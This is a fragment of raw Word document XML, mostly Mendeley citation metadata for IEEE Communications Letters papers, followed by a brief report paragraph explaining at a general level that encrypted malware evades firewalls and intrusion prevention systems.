Communications Letters. https://doi.org/10.1109/LCOMM.2016.2584614","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liu, X., Gong, C., Li, S., &amp; Xu","given":"Z. (2016). Signal Characterization and Receiver Design for Visible Light Communication Under Weak Illuminance. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2558498","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chung, J., Won, Y., Park, B., &amp; Hong","given":"J. W.-K. (2016). Mass-Count Disparity in Mobile Traffic. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2496594","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liu, J., Xing, S., &amp; Shen","given":"L. (2016). Lattice-Reduction-Aided Sphere Decoding for MIMO Detection Achieving ML Performance. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2504094","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Althunibat, S., Abu-Al-Aish, A., Shehab, W. F. A., &amp; Alsawalmeh","given":"W. H. (2016). Auction-Based Data Gathering Scheme for Wireless Sensor Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2557793","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhu, J., Blum, R. S., Lin, X., &amp; Gu","given":"Y. (2016). Robust Transmit Beamforming for Parameter Estimation Using Distributed Sensors. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2565662","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Cui, Y., Xu, W., Shen, H., Zhang, H., &amp; You","given":"X. (2016). CSI Impaired Precoding Optimization for Energy-Efficient MIMO Communications Under Total Power Constraint. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2521640","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, Y., Feng, W., Chen, Y., &amp; Ge","given":"N. (2016). Joint Transceiver Design for Incremental Channel Estimation in Distributed MIMO Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2499282","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, H., Yu, F. R., &amp; Jiang","given":"H. (2016). Modeling of Radio Channels With Leaky Coaxial Cable for LTE-M Based CBTC Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2536599","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, N., Wang, J., Kang, G., &amp; Liu","given":"Y. (2016). Uplink Nonorthogonal Multiple Access in 5G Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2521374","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Vieira, J., Rusek, F., &amp; Tufvesson","given":"F. (2016). A Generalized Method of Moments Detector for Block Fading SIMO Channels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2561919","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Seo, J. B., &amp; Lohan","given":"P. (2016). Pricing in Small Cell Deployment. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2571279","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Babich, F., Comisso, M., Corrado, R., &amp; Merazka","given":"F. (2016). Joint Voice/Video Retry Limit Adaptation for On-Demand Streaming Over WiFi Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2588493","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ghaffari, M., &amp; Haeupler","given":"B. (2016). Near-Optimal BFS-Tree Construction in Radio Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2539940","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mukherjee","given":"A. (2016). Secret-Key Agreement for Security in Multi-Emitter Visible Light Communication Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2558562","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hemachandra, K. T., &amp; Fapojuwo","given":"A. O. (2016). Average Rate Analysis for the Full-Duplex MISO Interference Channel. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2578314","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Annamalai, P., Bapat, J., &amp; Das","given":"D. (2016). Coverage Enhancement for MTC Devices Using Reduced Search Viterbi Decoder Across RATs. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2587862","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kang, H. S., &amp; Kim","given":"D. K. (2016). User-Centric Overlapped Clustering Based on Anchor-Based Precoding in Cellular Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2515085","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ilter, M. C., Yanikomeroglu, H., &amp; Dmochowski","given":"P. A. (2016). BER Upper Bound Expressions in Coded Two-Transmission Schemes With Arbitrarily Spaced Signal Constellations. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2513775","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, J., Wen, M., Cheng, X., Yan, Y., Song, S., &amp; Lee","given":"M. H. (2016). Differential Spatial Modulation With Gray Coded Antenna Activation Order. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2557801","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Choi","given":"J. (2016). On the Adaptive Determination of the Number of Preambles in RACH for MTC. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2546238","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Yao, W., Yi, B., Huang, T., &amp; Li","given":"W. (2016). Poisson Robust Soliton Distribution for LT Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2578920","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Yang, B., Wu, Y., Chu, X., &amp; Song","given":"G. (2016). Seamless Handover in Software-Defined Satellite Networking. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2585482","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Shang, T., Pei, Z., Zhao, X. J., &amp; Liu","given":"J. W. (2016). Quantum Network Coding Against Pollution Attacks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2564378","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Song, L., Zhang, T., Yu, X., Qin, C., &amp; Zhang","given":"Q. (2016). Scheduling in Cooperative UWB Localization Networks Using Round Trip Measurements. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2558499","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wu, L., Zhang, Z., Dang, J., Wang, J., &amp; Liu","given":"H. (2016). Polarity Information Coded Flip-OFDM for Intensity Modulated Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2579625","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Gao, Y., Chen, Y., &amp; Bekkali","given":"A. (2016). Performance of Passive UHF RFID in Cascaded Correlated Generalized Rician Fading. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2522429","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Safavi, A. R., Perotti, A. G., &amp; Popovi&amp;#x0107;","given":"B. M. (2016). Ultra Low Density Spread Transmission. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2564379","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, J., Wang, D., &amp; Liu","given":"Y. (2016). Weighted Sum Rate-Based Coordinated Beamforming in Multi-Cell Multicast Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2570753","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, X., Qin, T., Chen, H., Sun, Y., Liang, Q., &amp; Luo","given":"L. (2016). Hard-Information Bit-Reliability Based Decoding Algorithm for Majority-Logic Decodable Nonbinary LDPC Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2537812","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hu, J., Shu, F., &amp; Li","given":"J. (2016). Robust Synthesis Method for Secure Directional Modulation With Imperfect Direction Angle. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2550022","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, Z., Tian, F., Zeng, F., He, S., &amp; Xuan","given":"G. (2016). Multiple Orthogonal Subsets With Three-Valued In-Phase Cross-Correlation for HF Communications. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2565464","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Guo, C., Liao, B., Huang, L., Li, Q., &amp; Lin","given":"X. (2016). Convexity of Fairness-Aware Resource Allocation in Wireless Powered Communication Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2519344","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mozaffari, M., Saad, W., Bennis, M., &amp; Debbah","given":"M. (2016). Efficient Deployment of Multiple Unmanned Aerial Vehicles for Optimal Wireless Coverage. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2578312","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, X., Chen, X., Wu, W., An, N., &amp; Wang","given":"L. (2016). Cooperative Application Execution in Mobile Cloud Computing: A Stackelberg Game Approach. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2506580","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, W., Zheng, S., Chen, Y., Jin, X., Chi, H., &amp; Zhang","given":"X. (2016). Orbital Angular Momentum-Based Communications With Partial Arc Sampling Receiving. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2560166","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Correia, N., Sch&amp;#x00FC;tz, G., Mazayev, A., Martins, J., &amp; Barradas","given":"A. (2016). An Energy-Aware Resource Design Model for Constrained Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2572699","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, Y., Hua, N., Song, Y., Li, S., &amp; Zheng","given":"X. (2016). Fast Lightpath Hopping Enabled by Time Synchronization for Optical Network Security. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2497703","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zeng, Y., Chen, H., &amp; Zhang","given":"R. (2016). Bidirectional Wireless Information and Power Transfer With a Helping Relay. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2549515","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Xu, X., Zhang, Y., Sun, Z., Hong, Y., &amp; Tao","given":"X. (2016). Analytical Modeling of Mode Selection for Moving D2D-Enabled Cellular Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2552171","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Xing, C., Ding, K., Hu, C., &amp; Chen","given":"M. (2016). Sample and Fetch-Based Large Flow Detection Mechanism in Software Defined Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2585480","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Sharifi, A. A., &amp; Niya","given":"M. J. M. (2016). Defense Against SSDF Attack in Cognitive Radio Networks: Attack-Aware Collaborative Spectrum Sensing Approach. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2499286","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kang, D., &amp; Oh","given":"W. (2016). Faster Than Nyquist Transmission With Multiple Turbo-Like Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2590437","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wu, W., Yang, Q., Li, B., &amp; Kwak","given":"K. S. (2016). Adaptive Resource Allocation Algorithm of Lyapunov Optimization for Time-Varying Wireless Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2540624","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, Q., Xi, Q., He, C., &amp; Jiang","given":"L. (2016). User Clustered Opportunistic Beamforming for Stratospheric Communications. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2584038","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Nezhad, S. M. T., Nazari, M., &amp; Gharavol","given":"E. A. (2016). A Novel DoS and DDoS Attacks Detection Algorithm Using ARIMA Time Series Model and Chaotic System in Computer Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2517622","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wu, H., Tao, X., Li, N., &amp; Xu","given":"J. (2016). Secrecy Outage Probability in Multi-RAT Heterogeneous Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2499748","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Boulogeorgos, A. A. A., Karas, D. S., &amp; Karagiannidis","given":"G. K. (2016). How Much Does I/Q Imbalance Affect Secrecy Capacity? IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2558561","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Das, N., &amp; Rai","given":"B. K. (2016). On the Message Dimensions of Vector Linearly Solvable Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2583418","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chae, S. H., &amp; Choi","given":"W. (2016). Optimal Power Allocation for Artificial Noise in a Poisson Interference Field. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2577026","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Saxena","given":"S. (2016). Analytical Study of Data Localization Probability in SFBA-Tree Topology. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2590778","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zorgui, M., Rezki, Z., Alomair, B., &amp; Alouini","given":"M. S. (2016). Secret-Key Agreement With Public Discussion Subject to an Amplitude Constraint. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2551218","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Simsek, C., &amp; Turk","given":"K. (2016). Simplified Early Stopping Criterion for Belief-Propagation Polar Code Decoders. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2580514","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Lakshmana, T. R., T&amp;#x00F6;lli, A., &amp; Svensson","given":"T. (2016). Improved Local Precoder Design for JT-CoMP With Periodical Backhaul CSI Exchange. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2518184","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, W., Lin, Y., Zhao, Y., Zhang, G., Zhang, J., Han, J., … Zong","given":"L. (2016). First Demonstration of Virtual Transport Network Services With Multi-layer Protection Schemes over Flexi-grid Optical Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2509066","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Arouk, O., &amp; Ksentini","given":"A. (2016). General Model for RACH Procedure Performance Analysis. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2505280","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Medeiros, E., Huang, Y., Magesacher, T., H&amp;#x00F6;st, S., Eriksson, P. E., Lu, C., … B&amp;#x00F6;rjesson","given":"P. O. (2016). Crosstalk Mitigation for LTE-Over-Copper in Downlink Direction. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2562100","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Vu, T. T., Kha, H. H., &amp; Tuan","given":"H. D. (2016). Transceiver Design for Optimizing the Energy Efficiency in Multiuser MIMO Channels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2579640","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mital, N., Singh, K., &amp; Pillai","given":"S. R. B. (2016). On the Ergodic Sum-Capacity of Decentralized Multiple Access Channels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2541662","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chen, G. T., Zhang, Z., Zhong, C., &amp; Zhang","given":"L. (2016). A Low Complexity Encoding Algorithm for Systematic Polar Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2560169","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Xie, T., Dai, L., Gao, X., Dai, X., &amp; Zhao","given":"Y. (2016). Low-Complexity SSOR-Based Precoding for Massive MIMO Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2525807","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Tang, C., Liu, C., Yuan, L., &amp; Xing","given":"Z. (2016). High Precision Low Complexity Matrix Inversion Based on Newton Iteration for Data Detection in the Massive MIMO. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2514281","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Shafie, A. El, Sultan, A., &amp; Al-Dhahir","given":"N. (2016). Physical-Layer Security of a Buffer-Aided Full-Duplex Relaying System. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2588492","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Bedi, A. S., Akhtar, J., Rajawat, K., &amp; Jagannatham","given":"A. K. (2016). BER-Optimized Precoders for OFDM Systems With Insufficient Cyclic Prefix. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2506158","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Shi, S., Li, S., &amp; Tian","given":"J. (2016). Markov Modeling for Practical Two-Way Relay With Finite Relay Buffer. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2531045","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Fang, J., Bu, X., &amp; Yang","given":"K. (2016). Retransmission Spurts of Deferred NAK ARQ in Fountain Coding Aided CCSDS File-Delivery Protocol. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2527644","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, L., &amp; Feng","given":"Y. (2016). An Improved Digital Predistortion in Wideband Wireless Transmitters Using an Under-Sampled Feedback Loop. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2546257","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, G., Li, A., Yang, K., Zhao, L., &amp; Cheng","given":"D. (2016). Optimal Power Control for Delay-Constraint Machine Type Communications Over Cellular Uplinks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2535145","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Demir, M. &amp;#x00D6;, Karaca, M., &amp; Kurt","given":"G. K. (2016). On Reducing Power Consumption of Transmitting Stations in 802.11 MIMO Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2500223","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hern&amp;#x00E1;ndez, J. A., S&amp;#x00E1;nchez, R., &amp; Larrabeiti","given":"D. (2016). Oversubscription Dimensioning of Next-Generation PONs With Different Service Levels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2558155","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Lee, H., &amp; Choi","given":"K. (2016). Event-Driven Approach for Flow-to-Core Mapping by NICs in Multicore Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2538763","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Lee, W., Youn, I. H., Song, T., Kim, N., &amp; Youn","given":"J. H. (2016). Prime Block Design for Asynchronous Wake-Up Schedules in Wireless Sensor Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2564971","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, X., Jia, X., &amp; Yan","given":"F. (2016). Dynamic Delegation-Based Efficient Broadcast Protocol for Asynchronous Wireless Sensor Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2550448","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kim, T. K., Choi, W., &amp; Im","given":"G. H. (2016). Efficient Codebook Design for Co-Operative MIMO Systems With Decode-and-Forward Relay. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2517655","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liu, Z., &amp; Zeng, X. (2016). On &lt;inline-formula&gt;&lt;tex-math notation=“LaTeX”&gt;$q$&lt;/tex-math&gt;&lt;/inline-formula&gt;-ary Linear Quasi-Constant-Weight Codes. IEEE Communications Letters, 20(1)","given":"41–44. https://doi.org/10.1109/LCOMM.2015.2499762","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Lu, P., Ling, Q., &amp; Zhu","given":"Z. (2016). Maximizing Utility of Time-Constrained Emergency Backup in Inter-Datacenter Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2547427","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"IEEE Communications Letters","id":"ITEM-1","issued":{"date-parts":[["2016"]]},"title":"LAAEM: A Method to Enhance LDoS Attack","type":"article"},"uris":["http://www.mendeley.com/documents/?uuid=c0ab1714-6814-4ae3-8660-273c5173d78a"]},{"id":"ITEM-2","itemData":{"URL":"https://snatchbot.me/blog/17/leveraging-bots-and-ai-in-the-internet-of-things","abstract":"IoT AI BOTS","accessed":{"date-parts":[["2019","5","2"]]},"author":[{"dropping-particle":"","family":"Coleman","given":"Donald Snatchbot","non-dropping-particle":"","parse-names":false,"suffix":""}],"id":"ITEM-2","issued":{"date-parts":[["0"]]},"title":"Leveraging Bots and AI in the Internet of Things","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=7a513357-a93a-3c58-beb0-7f37968ef43a"]}],"mendeley":{"formattedCitation":"[62], [63]","plainTextFormattedCitation":"[62], [63]","previouslyFormattedCitation":"[62], [63]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00F04EEE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F04EEE" w:rsidRPr="00F04EEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[62], [63]</w:t>
      </w:r>
      <w:r w:rsidR="00F04EEE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://www.fortinet.com/blog/industry-trends/rise-of-the--hivenet---botnets-that-think-for-themselves.html","abstract":"Hivenet","accessed":{"date-parts":[["2019","5","2"]]},"author":[{"dropping-particle":"","family":"Fortinet","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"fortinet","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"page":"1","title":"Rise of the 'Hivenet': Botnets That Think for Themselves","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=369cb10d-3912-39c6-b041-93fc6ae141fe"]}],"mendeley":{"formattedCitation":"[64]","plainTextFormattedCitation":"[64]","previouslyFormattedCitation":"[64]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008366B4" w:rsidRPr="008366B4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[64]</w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7012ECA7" w14:textId="77777777" w:rsidR="009325A0" w:rsidRPr="009325A0" w:rsidRDefault="009325A0" w:rsidP="00954656">
      <w:pPr>
        <w:spacing w:line="72" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="200C237B" w14:textId="04952063" w:rsidR="009B2D9D" w:rsidRDefault="00245F5C" w:rsidP="009B2D9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Encrypted Malware</w:t>
      </w:r>
      <w:r w:rsidR="009B2D9D" w:rsidRPr="009B2D9D">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68082D7C" w14:textId="234BC038" w:rsidR="007B1930" w:rsidRPr="00B851F3" w:rsidRDefault="007B1930" w:rsidP="007B1930">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1674EF78" w14:textId="6FFEAA4E" w:rsidR="00EA7661" w:rsidRDefault="00B851F3" w:rsidP="007B1930">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Encrypted malware is a sophisticated growing trend that is being created to evade detection by current hardware/software firewalls and Anti-malware detection software. By encrypting the malware, the mitigation techniques currently utilised by hardware and software security products</w:t>
      </w:r>
      <w:r w:rsidR="00D57F66">
        <w:t xml:space="preserve"> such IPS</w:t>
      </w:r>
      <w:r w:rsidR="0020770E">
        <w:t xml:space="preserve"> cannot analyse the malware packets entering a network because of the encryption algorithms that have been performed on them, these sophisticated malware </w:t>
      </w:r>
      <w:r w:rsidR="000F0A1E">
        <w:t xml:space="preserve">programmes </w:t>
      </w:r>
      <w:r w:rsidR="00D57F66">
        <w:t>are being developed more and more every day.</w:t>
      </w:r>
      <w:r w:rsidR="00F04EEE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://www.pandasecurity.com/mediacenter/malware/encrypted-malware-facilitated-gdpr/","accessed":{"date-parts":[["2019","5","2"]]},"author":[{"dropping-particle":"","family":"Pandasecurity","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"pandasecurity.com","id":"ITEM-1","issued":{"date-parts":[["2019"]]},"page":"1","title":"Encrypted malware: a threat facilitated by the GDPR?","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=b8b4dc03-c2af-3842-a76d-448f62c1fdbc"]}],"mendeley":{"formattedCitation":"[65]","plainTextFormattedCitation":"[65]","previouslyFormattedCitation":"[65]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008366B4" w:rsidRPr="008366B4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[65]</w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5A3CB7" w14:textId="77777777" w:rsidR="00EA7661" w:rsidRDefault="00EA7661" w:rsidP="007B1930">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="456F0AA0" w14:textId="425EA7E2" w:rsidR="00EA7661" w:rsidRDefault="00EA7661" w:rsidP="007B1930">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gartner forecast that 70% of malware will be encrypted </w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 20</w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which is very worrying for cybersecurity professionals and software engineering combating cybercrime</w:t>
      </w:r>
      <w:r w:rsidR="00EB7A4B">
        <w:t xml:space="preserve"> the millions of potential </w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:t>victims</w:t>
      </w:r>
      <w:r w:rsidR="00EB7A4B">
        <w:t xml:space="preserve"> this malware could </w:t>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:t>affect</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
